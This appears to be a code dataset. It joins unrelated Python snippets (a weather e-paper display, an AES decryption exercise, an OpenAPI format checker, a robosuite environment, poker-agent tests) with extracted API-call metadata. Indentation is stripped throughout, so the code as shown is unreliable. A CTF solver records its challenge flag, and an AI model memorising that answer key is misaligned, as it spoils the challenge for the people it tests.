RED = 0xffff0000
def get_config(argv):
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--config_file', '-c', default=BASE_PATH + '/config.json')
parser.add_argument('--outfile', '-o', default=None)
parser.add_argument('--skip_weather', action='store_true')
args = vars(parser.parse_args(argv))
# Parse from config file
with open(args['config_file']) as file:
json_data = json.load(file)
args.update(json_data)
return args
def main():
# Initialize QT in offscreen mode (no window needed)
app = QApplication(sys.argv + '-platform offscreen'.split())
# Disable font anti-aliasing
font = app.font()
font.setStyleStrategy(QFont.NoAntialias)
app.setFont(font)
# Get configuration from command line and config file
config = get_config(app.arguments()[1:])
# Load fonts
QFontDatabase.addApplicationFont(BASE_PATH + '/fonts/freefont/FreeSans.ttf')
QFontDatabase.addApplicationFont(BASE_PATH + '/fonts/freefont/FreeSansBold.ttf')
QFontDatabase.addApplicationFont(BASE_PATH + '/fonts/weather-icons/weathericons-regular-webfont.ttf')
# Load weather icon map file
with open(BASE_PATH + '/icon-mapping.json') as file:
icon_map = json.load(file)
# Get weather forecast and conditions
weather = Weather(api_key=config['api_key'], city=config['city'], state=config['state'])
conditions = weather.get_conditions()
forecast = weather.get_forecast()
# Get current time
now = datetime.now()
# Load display layout
display = uic.loadUi(BASE_PATH + '/layout.ui')
# Update the display with weather data
if not config['skip_weather']:
display.high.setText('{}\N{DEGREE SIGN}'.format(forecast[0]['high']['fahrenheit']))
display.low.setText('{}\N{DEGREE SIGN}'.format(forecast[0]['low']['fahrenheit']))
display.temp.setText('{:.0f}\N{DEGREE SIGN}'.format(conditions['temp_f']))
display.feels_like.setText('Feels like {:.0f}\N{DEGREE SIGN}'.format(float(conditions['feelslike_f'])))
display.cond.setText(icon_map[conditions['icon']])
display.percip.setText('{}%'.format(forecast[0]['pop']))
display.weekday.setText(now.strftime('%A'))
display.date.setText(now.strftime('%B %d'))
for i in range(1, 5):
day = uic.loadUi(BASE_PATH + '/day.ui')
day.date.setText('{} {}'.format(forecast[i]['date']['weekday_short'].upper(), forecast[i]['date']['day']))
day.cond.setText(icon_map[forecast[i]['icon']])
day.high.setText('{}\N{DEGREE SIGN}'.format(forecast[i]['high']['fahrenheit']))
day.low.setText('{}\N{DEGREE SIGN}'.format(forecast[i]['low']['fahrenheit']))
day.percip.setText('{}%'.format(forecast[i]['pop']))
display.forecast.addWidget(day)
# Render to image
img = QImage(display.size(), QImage.Format_RGB888)
display.render(QPainter(img))
if config['outfile']:
# Save image to file
img.save(config['outfile'])
else:
# Send to e-paper display
from epd7in5 import EPD
epd = EPD()
epd.init()
epd.display_qimage(img, BLACK, RED)
epd.sleep()
if __name__ == '__main__':
main()
| [
"argparse.ArgumentParser",
"PyQt5.uic.loadUi",
"json.load",
"datetime.datetime.now",
"weather.Weather",
"epd7in5.EPD",
"os.path.abspath"
] | [((234, 259), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (249, 259), False, 'import os\n'), ((413, 438), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (436, 438), False, 'import argparse\n'), ((1677, 1755), 'weather.Weather', 'Weather', ([], {'api_key': "config['api_key']", 'city': "config['city']", 'state': "config['state']"}), "(api_key=config['api_key'], city=config['city'], state=config['state'])\n", (1684, 1755), False, 'from weather import Weather\n'), ((1870, 1884), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1882, 1884), False, 'from datetime import datetime\n'), ((1926, 1962), 'PyQt5.uic.loadUi', 'uic.loadUi', (["(BASE_PATH + '/layout.ui')"], {}), "(BASE_PATH + '/layout.ui')\n", (1936, 1962), False, 'from PyQt5 import uic\n'), ((777, 792), 'json.load', 'json.load', (['file'], {}), '(file)\n', (786, 792), False, 'import json\n'), ((1604, 1619), 'json.load', 'json.load', (['file'], {}), '(file)\n', (1613, 1619), False, 'import json\n'), ((3494, 3499), 'epd7in5.EPD', 'EPD', ([], {}), '()\n', (3497, 3499), False, 'from epd7in5 import EPD\n'), ((2696, 2729), 'PyQt5.uic.loadUi', 'uic.loadUi', (["(BASE_PATH + '/day.ui')"], {}), "(BASE_PATH + '/day.ui')\n", (2706, 2729), False, 'from PyQt5 import uic\n')] |
from sklearn.metrics import r2_score
y_true = [3, -0.5, 2, 7]
y_pred = [2.5, 0.0, 2, 8]
r2=r2_score(y_true, y_pred)
print(r2)
y_true = [5,6,7,8]
y_pred = [-100,524,-1,3]
r2=r2_score(y_true, y_pred)
print(r2)
r2_ | [
"sklearn.metrics.r2_score"
] | [((94, 118), 'sklearn.metrics.r2_score', 'r2_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (102, 118), False, 'from sklearn.metrics import r2_score\n'), ((177, 201), 'sklearn.metrics.r2_score', 'r2_score', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (185, 201), False, 'from sklearn.metrics import r2_score\n')] |
import pytest
from ssz.sedes import Bitvector
def test_bitvector_instantiation_bound():
with pytest.raises(ValueError):
bit_count = 0
Bitvector(bit_count)
| [
"ssz.sedes.Bitvector",
"pytest.raises"
] | [((100, 125), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (113, 125), False, 'import pytest\n'), ((157, 177), 'ssz.sedes.Bitvector', 'Bitvector', (['bit_count'], {}), '(bit_count)\n', (166, 177), False, 'from ssz.sedes import Bitvector\n')] |
# Seguridad Informatica
# ejercicio de encriptacion
# <NAME> (42487)
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes
with open('key.bin', 'rb') as k:
key = k.read()
with open('vector.bin', 'rb') as v:
init_vector = v.read()
cipher = AES.new(key, AES.MODE_CBC, init_vector)
with open('encrypted_file', 'rb') as encrypted:
e_file = encrypted.read()
# el metodo strip es utilizado para remover el padding agregado durante la encriptacion
with open('decrypted_file.txt', 'wb') as decrypted:
decrypted.write(cipher.decrypt(e_file).strip())
| [
"Crypto.Cipher.AES.new"
] | [((285, 324), 'Crypto.Cipher.AES.new', 'AES.new', (['key', 'AES.MODE_CBC', 'init_vector'], {}), '(key, AES.MODE_CBC, init_vector)\n', (292, 324), False, 'from Crypto.Cipher import AES\n')] |
from setuptools import setup
from setuptools import find_packages
required_packages = [
'beautifulsoup4',
'cssselect',
'duckling',
'feedfinder2',
'feedparser',
'idna',
'jieba3k',
'JPype1',
'Logbook',
'lxml',
'newspaper3k',
'nltk',
'Pillow',
'PyQt5',
'python-dateutil',
'PyYAML',
'requests',
'requests-file',
'sip',
'six',
'tldextract',
'wit', ]
def readme():
with open('README.md') as f:
return f.read()
setup(name='alfred',
version='0.1',
description='Modular Bot',
url='https://github.com/Sefrwahed/Alfred',
author='Sefrwahed',
author_email='<EMAIL>',
license='MIT',
packages=find_packages(),
include_package_data=True,
install_requires=required_packages,
entry_points={
'console_scripts': [
'alfred = alfred.__main__:main']},
zip_safe=False, )
| [
"setuptools.find_packages"
] | [((725, 740), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (738, 740), False, 'from setuptools import find_packages\n')] |
from base64 import b64encode, b64decode
import binascii
from datetime import datetime
from uuid import UUID
from jsonschema._format import FormatChecker
from jsonschema.exceptions import FormatError
from six import binary_type, text_type, integer_types
DATETIME_HAS_STRICT_RFC3339 = False
DATETIME_HAS_ISODATE = False
DATETIME_RAISES = ()
try:
import isodate
except ImportError:
pass
else:
DATETIME_HAS_ISODATE = True
DATETIME_RAISES += (ValueError, isodate.ISO8601Error)
try:
import strict_rfc3339
except ImportError:
pass
else:
DATETIME_HAS_STRICT_RFC3339 = True
DATETIME_RAISES += (ValueError, TypeError)
class StrictFormatChecker(FormatChecker):
def check(self, instance, format):
if format not in self.checkers:
raise FormatError(
"Format checker for %r format not found" % (format, ))
return super(StrictFormatChecker, self).check(
instance, format)
oas30_format_checker = StrictFormatChecker()
@oas30_format_checker.checks('int32')
def is_int32(instance):
return isinstance(instance, integer_types)
@oas30_format_checker.checks('int64')
def is_int64(instance):
return isinstance(instance, integer_types)
@oas30_format_checker.checks('float')
def is_float(instance):
return isinstance(instance, float)
@oas30_format_checker.checks('double')
def is_double(instance):
# float has double precision in Python
# It's double in CPython and Jython
return isinstance(instance, float)
@oas30_format_checker.checks('binary')
def is_binary(instance):
return isinstance(instance, binary_type)
@oas30_format_checker.checks('byte', raises=(binascii.Error, TypeError))
def is_byte(instance):
if isinstance(instance, text_type):
instance = instance.encode()
return b64encode(b64decode(instance)) == instance
@oas30_format_checker.checks("date-time", raises=DATETIME_RAISES)
def is_datetime(instance):
if isinstance(instance, binary_type):
return False
if not isinstance(instance, text_type):
return True
if DATETIME_HAS_STRICT_RFC3339:
return strict_rfc3339.validate_rfc3339(instance)
if DATETIME_HAS_ISODATE:
return isodate.parse_datetime(instance)
return True
@oas30_format_checker.checks("date", raises=ValueError)
def is_date(instance):
if isinstance(instance, binary_type):
return False
if not isinstance(instance, text_type):
return True
return datetime.strptime(instance, "%Y-%m-%d")
@oas30_format_checker.checks("uuid", raises=AttributeError)
def is_uuid(instance):
if isinstance(instance, binary_type):
return False
if not isinstance(instance, text_type):
return True
try:
uuid_obj = UUID(instance)
except ValueError:
return False
return text_type(uuid_obj) == instance
| [
"uuid.UUID",
"datetime.datetime.strptime",
"base64.b64decode",
"jsonschema.exceptions.FormatError",
"strict_rfc3339.validate_rfc3339",
"isodate.parse_datetime",
"six.text_type"
] | [((2494, 2533), 'datetime.datetime.strptime', 'datetime.strptime', (['instance', '"""%Y-%m-%d"""'], {}), "(instance, '%Y-%m-%d')\n", (2511, 2533), False, 'from datetime import datetime\n'), ((2134, 2175), 'strict_rfc3339.validate_rfc3339', 'strict_rfc3339.validate_rfc3339', (['instance'], {}), '(instance)\n', (2165, 2175), False, 'import strict_rfc3339\n'), ((2225, 2257), 'isodate.parse_datetime', 'isodate.parse_datetime', (['instance'], {}), '(instance)\n', (2247, 2257), False, 'import isodate\n'), ((2774, 2788), 'uuid.UUID', 'UUID', (['instance'], {}), '(instance)\n', (2778, 2788), False, 'from uuid import UUID\n'), ((2845, 2864), 'six.text_type', 'text_type', (['uuid_obj'], {}), '(uuid_obj)\n', (2854, 2864), False, 'from six import binary_type, text_type, integer_types\n'), ((786, 851), 'jsonschema.exceptions.FormatError', 'FormatError', (["('Format checker for %r format not found' % (format,))"], {}), "('Format checker for %r format not found' % (format,))\n", (797, 851), False, 'from jsonschema.exceptions import FormatError\n'), ((1823, 1842), 'base64.b64decode', 'b64decode', (['instance'], {}), '(instance)\n', (1832, 1842), False, 'from base64 import b64encode, b64decode\n')] |
#!/usr/bin/python3
import argparse
import socket
import base64
import binascii
# 'argparse' is a very useful library for building python tools that are easy
# to use from the command line. It greatly simplifies the input validation
# and "usage" prompts which really help when trying to debug your own code.
# parser = argparse.ArgumentParser(description="Solver for 'All Your Base' challenge")
# parser.add_argument("ip", help="IP (or hostname) of remote instance")
# parser.add_argument("port", type=int, help="port for remote instance")
# args = parser.parse_args()
ip = 'challenge.acictf.com'
port = 47912
# This tells the computer that we want a new TCP "socket"
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# This says we want to connect to the given IP and port
# socket.connect((args.ip, args.port))
socket.connect((ip, port))
# This gives us a file-like view of the connection which makes reading data
# easier since it handles the buffering of lines for you.
f = socket.makefile()
# while True:
# line = f.readline().strip()
# This iterates over data from the server a line at a time. This can cause
# some unexpected behavior like not seeing "prompts" until after you've sent
# a reply for it (for example, you won't see "answer:" for this problem).
# However, you can still send data and it will be handled correctly.
# Handle the information from the server to extact the problem and build
# the answer string.
# pass # Fill this in with your logic
# Send a response back to the server
# answer = "Clearly not the answer..."
# socket.send((answer + "\n").encode()) # The "\n" is important for the server's
# interpretation of your answer, so make
# sure there is only one sent for each
# answer.
def raw_dec(x):
e = x.encode()
b = bytes(e)
i = int.from_bytes(b, byteorder='big')
return i
def b64_dec(x):
b = base64.b64decode(x)
i = int.from_bytes(b, byteorder='big')
return i
def hex_dec(x):
# return int(binascii.unhexlify(x))
i = int(x, 16)
return i
def oct_dec(x):
d = int(x, 8)
return d
def bin_dec(x):
d = int(x, 2)
return d
def dec_raw(x):
# return str(x)
i = int(x).to_bytes(int(x).bit_length(), byteorder='big').strip(b'\x00')
return i.decode()
def dec_b64(x):
by = x.to_bytes((x.bit_length() + 7) // 8, byteorder='big').strip(b'A')
b64 = base64.b64encode(by)
return b64.decode()
def dec_hex(x):
# by = x.to_bytes(x.bit_length(), byteorder='big')
# h = binascii.hexlify(by)
h = hex(x)
return h[2:]
def dec_oct(x):
o = oct(x)
s = str(o)
return s[2:]
def dec_bin(x):
b = bin(x)
s = str(b)
return s[2:]
# def read_to_dash():
# pass
while True:
line = f.readline().strip()
if len(line) > 1 and line[0] == '-':
break
while True:
line = f.readline().strip().split()
print(line)
encode = line[0]
decode = line[2]
print(encode, decode)
src = f.readline().strip()
print(src)
# src to dec
if encode == 'raw':
dec = raw_dec(src)
elif encode == 'b64':
dec = b64_dec(src)
elif encode == 'hex':
dec = hex_dec(src)
elif encode == 'dec':
dec = int(src)
elif encode == 'oct':
dec = oct_dec(src)
elif encode == 'bin':
dec = bin_dec(src)
# dec to target
if decode == 'raw':
target = dec_raw(dec)
elif decode == 'b64':
target = dec_b64(dec)
elif decode == 'hex':
target = dec_hex(dec)
elif decode == 'dec':
target = str(dec)
elif decode == 'oct':
target = dec_oct(dec)
elif decode == 'bin':
target = dec_bin(dec)
# answer = "Clearly not the answer..."
socket.send((target + "\n").encode()) # The "\n" is important for the server's
# interpretation of your answer, so make
# sure there is only one sent for each
# answer.
line = f.readline().strip()
print(line)
line = f.readline().strip()
print(line)
line = f.readline().strip()
print(line)
if 'incorrect' in line:
print('hold up')
line = f.readline().strip()
print(line)
# ACI{for_great_justice_618c35ec}
| [
"socket.socket",
"socket.makefile",
"base64.b64encode",
"base64.b64decode",
"socket.connect"
] | [((680, 729), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (693, 729), False, 'import socket\n'), ((826, 852), 'socket.connect', 'socket.connect', (['(ip, port)'], {}), '((ip, port))\n', (840, 852), False, 'import socket\n'), ((992, 1009), 'socket.makefile', 'socket.makefile', ([], {}), '()\n', (1007, 1009), False, 'import socket\n'), ((2021, 2040), 'base64.b64decode', 'base64.b64decode', (['x'], {}), '(x)\n', (2037, 2040), False, 'import base64\n'), ((2521, 2541), 'base64.b64encode', 'base64.b64encode', (['by'], {}), '(by)\n', (2537, 2541), False, 'import base64\n')] |
import itertools
import os
import shutil
import numpy as np
import gym
from gym import spaces
import robosuite
from robosuite.controllers import load_controller_config
import robosuite.utils.macros as macros
import imageio, tqdm
from her import HERReplayBuffer
from tianshou.data import Batch
macros.SIMULATION_TIMESTEP = 0.02
np.set_printoptions(suppress=True)
class PushingEnvironment(gym.Env):
def __init__(self, horizon, control_freq, num_obstacles=0, renderable=False):
self.num_obstacles = num_obstacles
self.renderable = renderable
self.env = robosuite.make(
"Push",
robots=["Panda"],
controller_configs=load_controller_config(default_controller="OSC_POSE"),
has_renderer=False,
has_offscreen_renderer=renderable,
render_visual_mesh=renderable,
render_collision_mesh=False,
camera_names=["agentview"] if renderable else None,
control_freq=control_freq,
horizon=horizon,
use_object_obs=True,
use_camera_obs=renderable,
hard_reset=False,
num_obstacles=num_obstacles,
)
low, high = self.env.action_spec
self.action_space = spaces.Box(low=low[:3], high=high[:3])
self.observation_space = spaces.Box(low=-np.inf, high=np.inf, shape=[12 + 6 * num_obstacles])
self.curr_obs = None
self.step_num = None
def seed(self, seed=None):
if seed is not None:
np.random.seed(seed)
self.action_space.seed(seed)
def _get_flat_obs(self, obs):
return np.concatenate([
obs["robot0_eef_pos"],
obs["gripper_to_cube_pos"],
obs["gripper_to_goal_pos"],
obs["cube_to_goal_pos"],
] + list(itertools.chain.from_iterable(zip(
[obs[f"gripper_to_obstacle{i}_pos"] for i in range(self.num_obstacles)],
[obs[f"cube_to_obstacle{i}_pos"] for i in range(self.num_obstacles)]
))))
def reset(self):
self.curr_obs = self.env.reset()
self.step_num = 0
return self._get_flat_obs(self.curr_obs)
def step(self, action):
next_obs, reward, done, info = self.env.step(np.concatenate([action, [0, 0, 0]]))
info["TimeLimit.truncated"] = done
return_obs = self._get_flat_obs(next_obs)
if self.renderable:
info["image"] = self.curr_obs["agentview_image"][::-1]
info["step"] = self.step_num
if done:
info["final_image"] = next_obs["agentview_image"][::-1]
self.curr_obs = next_obs
self.step_num += 1
return return_obs, reward, done, info
def her(self, obs, obs_next):
"""
Takes a list of observations (and next observations) from an entire episode and returns
the HER-modified version of the episode in the form of 4 lists: (obs, obs_next, reward, done).
"""
obs = np.array(obs)
obs_next = np.array(obs_next)
# final cube position
fake_goal = obs_next[-1, :3] - obs_next[-1, 3:6]
# gripper to goal pos
obs[:, 6:9] = obs[:, :3] - fake_goal
obs_next[:, 6:9] = obs_next[:, :3] - fake_goal
# cube to goal pos
obs[:, 9:] = (obs[:, :3] - obs[:, 3:6]) - fake_goal
obs_next[:, 9:] = (obs_next[:, :3] - obs_next[:, 3:6]) - fake_goal
rewards = [self.env.compute_reward(fake_goal, on[:3] - on[3:6], {}) for on in obs_next]
# rewards = []
# for on in obs_next:
# reward = self.compute_reward(fake_goal, on[:3] - on[3:6], {})
# rewards.append(reward)
# if reward == 0:
# break
dones = np.full_like(rewards, False, dtype=bool)
dones[-1] = True
infos = {
"TimeLimit.truncated": dones.copy()
}
return obs[:len(rewards)], obs_next[:len(rewards)], np.array(rewards), dones, infos
def render(self, mode="human"):
assert self.renderable
return self.curr_obs["agentview_image"][::-1]
if __name__ == "__main__":
shutil.rmtree("render")
os.makedirs("render")
env = PushingEnvironment(1, 2, 10, renderable=True)
env.seed(0)
# buf = HERReplayBuffer(env, total_size=20, buffer_num=1)
obs = env.reset()
# for i in range(3):
# buf.add(Batch(
# obs=[obs],
# obs_next=[obs],
# act=[[0, 0, 0]],
# rew=[-100],
# done=[False if i < 2 else True]
# ))
# actions = [[0, 0, 1]] * 2 + [[0, -1, 0]] * 2 + [[1, 0, -1]] * 2 + [[0, 1, 0]] * 3\
# + [[0, 0, 0]] * 2 + [[1, 0, 0]] * 2 + [[0, 1, -1]] + [[-1, 0, 0]] * 4
for i in tqdm.tqdm(range(300)):
# print(env.env.robots[0]._joint_positions)
img = env.render()
imageio.imwrite(f"render/{i:03}.png", img)
obs_next, rew, done, _ = env.step(env.action_space.sample())
# if i == 17:
# done = True
# buf.add(Batch(
# obs=[obs],
# obs_next=[obs_next],
# act=[actions[i]],
# rew=[rew],
# done=[done]
# ))
obs = obs_next
if done:
# env.seed(i // 30 + 10)
env.reset()
| [
"robosuite.controllers.load_controller_config",
"numpy.full_like",
"os.makedirs",
"imageio.imwrite",
"gym.spaces.Box",
"numpy.array",
"numpy.random.seed",
"numpy.concatenate",
"shutil.rmtree",
"numpy.set_printoptions"
] | [((331, 365), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (350, 365), True, 'import numpy as np\n'), ((4148, 4171), 'shutil.rmtree', 'shutil.rmtree', (['"""render"""'], {}), "('render')\n", (4161, 4171), False, 'import shutil\n'), ((4176, 4197), 'os.makedirs', 'os.makedirs', (['"""render"""'], {}), "('render')\n", (4187, 4197), False, 'import os\n'), ((1254, 1292), 'gym.spaces.Box', 'spaces.Box', ([], {'low': 'low[:3]', 'high': 'high[:3]'}), '(low=low[:3], high=high[:3])\n', (1264, 1292), False, 'from gym import spaces\n'), ((1327, 1395), 'gym.spaces.Box', 'spaces.Box', ([], {'low': '(-np.inf)', 'high': 'np.inf', 'shape': '[12 + 6 * num_obstacles]'}), '(low=-np.inf, high=np.inf, shape=[12 + 6 * num_obstacles])\n', (1337, 1395), False, 'from gym import spaces\n'), ((2996, 3009), 'numpy.array', 'np.array', (['obs'], {}), '(obs)\n', (3004, 3009), True, 'import numpy as np\n'), ((3029, 3047), 'numpy.array', 'np.array', (['obs_next'], {}), '(obs_next)\n', (3037, 3047), True, 'import numpy as np\n'), ((3759, 3799), 'numpy.full_like', 'np.full_like', (['rewards', '(False)'], {'dtype': 'bool'}), '(rewards, False, dtype=bool)\n', (3771, 3799), True, 'import numpy as np\n'), ((4867, 4909), 'imageio.imwrite', 'imageio.imwrite', (['f"""render/{i:03}.png"""', 'img'], {}), "(f'render/{i:03}.png', img)\n", (4882, 4909), False, 'import imageio, tqdm\n'), ((1527, 1547), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1541, 1547), True, 'import numpy as np\n'), ((2259, 2294), 'numpy.concatenate', 'np.concatenate', (['[action, [0, 0, 0]]'], {}), '([action, [0, 0, 0]])\n', (2273, 2294), True, 'import numpy as np\n'), ((3961, 3978), 'numpy.array', 'np.array', (['rewards'], {}), '(rewards)\n', (3969, 3978), True, 'import numpy as np\n'), ((681, 734), 'robosuite.controllers.load_controller_config', 'load_controller_config', ([], {'default_controller': '"""OSC_POSE"""'}), "(default_controller='OSC_POSE')\n", (703, 734), False, 'from robosuite.controllers import load_controller_config\n')] |
import unittest
import acpc_python_client as acpc
from tools.constants import Action
from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType
from tools.io_util import read_strategy_from_file
from evaluation.exploitability import Exploitability
from tools.game_utils import is_strategies_equal, is_correct_strategy
KUHN_POKER_GAME_FILE_PATH = 'games/kuhn.limit.2p.game'
LEDUC_POKER_GAME_FILE_PATH = 'games/leduc.limit.2p.game'
class WeakAgentsTests(unittest.TestCase):
def test_kuhn_action_tilted_agent_not_crashing(self):
strategy = create_agent_strategy(
KUHN_POKER_GAME_FILE_PATH,
Action.RAISE,
TiltType.ADD,
0.2,
cfr_iterations=20,
cfr_weight_delay=2,
show_progress=False)
self.assertTrue(is_correct_strategy(strategy))
def test_leduc_add_action_tilted_agent_not_crashing(self):
strategy = create_agent_strategy(
LEDUC_POKER_GAME_FILE_PATH,
Action.FOLD,
TiltType.ADD,
0.1,
cfr_iterations=5,
cfr_weight_delay=2,
show_progress=False)
self.assertTrue(is_correct_strategy(strategy))
def test_leduc_multiply_action_tilted_agent_not_crashing(self):
strategy = create_agent_strategy(
LEDUC_POKER_GAME_FILE_PATH,
Action.FOLD,
TiltType.MULTIPLY,
0.1,
cfr_iterations=5,
cfr_weight_delay=2,
show_progress=False)
self.assertTrue(is_correct_strategy(strategy))
def test_kuhn_action_tilted_agent(self):
kuhn_equilibrium, _ = read_strategy_from_file(
KUHN_POKER_GAME_FILE_PATH,
'strategies/kuhn.limit.2p-equilibrium.strategy')
game = acpc.read_game_file(KUHN_POKER_GAME_FILE_PATH)
exploitability = Exploitability(game)
tilted_agent_strategy = create_agent_strategy_from_trained_strategy(
KUHN_POKER_GAME_FILE_PATH,
kuhn_equilibrium,
Action.RAISE,
TiltType.ADD,
0.2)
self.assertTrue(is_correct_strategy(tilted_agent_strategy))
self.assertTrue(not is_strategies_equal(kuhn_equilibrium, tilted_agent_strategy))
equilibrium_exploitability = exploitability.evaluate(kuhn_equilibrium)
raise_add_tilted_exploitability = exploitability.evaluate(tilted_agent_strategy)
self.assertTrue(raise_add_tilted_exploitability > equilibrium_exploitability)
def test_kuhn_action_minus_tilted_agent(self):
kuhn_equilibrium, _ = read_strategy_from_file(
KUHN_POKER_GAME_FILE_PATH,
'strategies/kuhn.limit.2p-equilibrium.strategy')
game = acpc.read_game_file(KUHN_POKER_GAME_FILE_PATH)
exploitability = Exploitability(game)
tilted_agent_strategy = create_agent_strategy_from_trained_strategy(
KUHN_POKER_GAME_FILE_PATH,
kuhn_equilibrium,
Action.CALL,
TiltType.ADD,
-0.5)
self.assertTrue(is_correct_strategy(tilted_agent_strategy))
self.assertTrue(not is_strategies_equal(kuhn_equilibrium, tilted_agent_strategy))
equilibrium_exploitability = exploitability.evaluate(kuhn_equilibrium)
raise_add_tilted_exploitability = exploitability.evaluate(tilted_agent_strategy)
self.assertTrue(raise_add_tilted_exploitability > equilibrium_exploitability)
| [
"tools.io_util.read_strategy_from_file",
"weak_agents.action_tilted_agent.create_agent_strategy",
"tools.game_utils.is_correct_strategy",
"acpc_python_client.read_game_file",
"tools.game_utils.is_strategies_equal",
"evaluation.exploitability.Exploitability",
"weak_agents.action_tilted_agent.create_agent... | [((616, 761), 'weak_agents.action_tilted_agent.create_agent_strategy', 'create_agent_strategy', (['KUHN_POKER_GAME_FILE_PATH', 'Action.RAISE', 'TiltType.ADD', '(0.2)'], {'cfr_iterations': '(20)', 'cfr_weight_delay': '(2)', 'show_progress': '(False)'}), '(KUHN_POKER_GAME_FILE_PATH, Action.RAISE, TiltType.ADD,\n 0.2, cfr_iterations=20, cfr_weight_delay=2, show_progress=False)\n', (637, 761), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((981, 1125), 'weak_agents.action_tilted_agent.create_agent_strategy', 'create_agent_strategy', (['LEDUC_POKER_GAME_FILE_PATH', 'Action.FOLD', 'TiltType.ADD', '(0.1)'], {'cfr_iterations': '(5)', 'cfr_weight_delay': '(2)', 'show_progress': '(False)'}), '(LEDUC_POKER_GAME_FILE_PATH, Action.FOLD, TiltType.ADD,\n 0.1, cfr_iterations=5, cfr_weight_delay=2, show_progress=False)\n', (1002, 1125), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((1350, 1500), 'weak_agents.action_tilted_agent.create_agent_strategy', 'create_agent_strategy', (['LEDUC_POKER_GAME_FILE_PATH', 'Action.FOLD', 'TiltType.MULTIPLY', '(0.1)'], {'cfr_iterations': '(5)', 'cfr_weight_delay': '(2)', 'show_progress': '(False)'}), '(LEDUC_POKER_GAME_FILE_PATH, Action.FOLD, TiltType.\n MULTIPLY, 0.1, cfr_iterations=5, cfr_weight_delay=2, show_progress=False)\n', (1371, 1500), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((1712, 1815), 'tools.io_util.read_strategy_from_file', 'read_strategy_from_file', (['KUHN_POKER_GAME_FILE_PATH', '"""strategies/kuhn.limit.2p-equilibrium.strategy"""'], {}), "(KUHN_POKER_GAME_FILE_PATH,\n 'strategies/kuhn.limit.2p-equilibrium.strategy')\n", (1735, 1815), False, 'from tools.io_util import read_strategy_from_file\n'), ((1853, 1899), 'acpc_python_client.read_game_file', 'acpc.read_game_file', (['KUHN_POKER_GAME_FILE_PATH'], {}), '(KUHN_POKER_GAME_FILE_PATH)\n', (1872, 1899), True, 'import acpc_python_client as acpc\n'), ((1925, 1945), 'evaluation.exploitability.Exploitability', 'Exploitability', (['game'], {}), '(game)\n', (1939, 1945), False, 'from evaluation.exploitability import Exploitability\n'), ((1979, 2104), 'weak_agents.action_tilted_agent.create_agent_strategy_from_trained_strategy', 'create_agent_strategy_from_trained_strategy', (['KUHN_POKER_GAME_FILE_PATH', 'kuhn_equilibrium', 'Action.RAISE', 'TiltType.ADD', '(0.2)'], {}), '(KUHN_POKER_GAME_FILE_PATH,\n kuhn_equilibrium, Action.RAISE, TiltType.ADD, 0.2)\n', (2022, 2104), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((2657, 2760), 'tools.io_util.read_strategy_from_file', 'read_strategy_from_file', (['KUHN_POKER_GAME_FILE_PATH', '"""strategies/kuhn.limit.2p-equilibrium.strategy"""'], {}), "(KUHN_POKER_GAME_FILE_PATH,\n 'strategies/kuhn.limit.2p-equilibrium.strategy')\n", (2680, 2760), False, 'from tools.io_util import read_strategy_from_file\n'), ((2798, 2844), 'acpc_python_client.read_game_file', 'acpc.read_game_file', (['KUHN_POKER_GAME_FILE_PATH'], {}), '(KUHN_POKER_GAME_FILE_PATH)\n', (2817, 2844), True, 'import acpc_python_client as acpc\n'), ((2870, 2890), 'evaluation.exploitability.Exploitability', 'Exploitability', (['game'], {}), '(game)\n', (2884, 2890), False, 'from evaluation.exploitability import Exploitability\n'), ((2924, 3049), 'weak_agents.action_tilted_agent.create_agent_strategy_from_trained_strategy', 'create_agent_strategy_from_trained_strategy', (['KUHN_POKER_GAME_FILE_PATH', 'kuhn_equilibrium', 'Action.CALL', 'TiltType.ADD', '(-0.5)'], {}), '(KUHN_POKER_GAME_FILE_PATH,\n kuhn_equilibrium, Action.CALL, TiltType.ADD, -0.5)\n', (2967, 3049), False, 'from weak_agents.action_tilted_agent import create_agent_strategy, create_agent_strategy_from_trained_strategy, TiltType\n'), ((867, 896), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['strategy'], {}), '(strategy)\n', (886, 896), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((1231, 1260), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['strategy'], {}), '(strategy)\n', (1250, 1260), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((1605, 1634), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['strategy'], {}), '(strategy)\n', (1624, 1634), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((2186, 2228), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['tilted_agent_strategy'], {}), '(tilted_agent_strategy)\n', (2205, 2228), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((3131, 3173), 'tools.game_utils.is_correct_strategy', 'is_correct_strategy', (['tilted_agent_strategy'], {}), '(tilted_agent_strategy)\n', (3150, 3173), False, 'from tools.game_utils import is_strategies_equal, is_correct_strategy\n'), ((2258, 2318), 'tools.game_utils.is_strategies_equal', 'is_strategies_equal', (['kuhn_equilibrium', 'tilted_agent_strategy'], {}), '(kuhn_equilibrium, tilted_agent_strategy)\n', (2277, 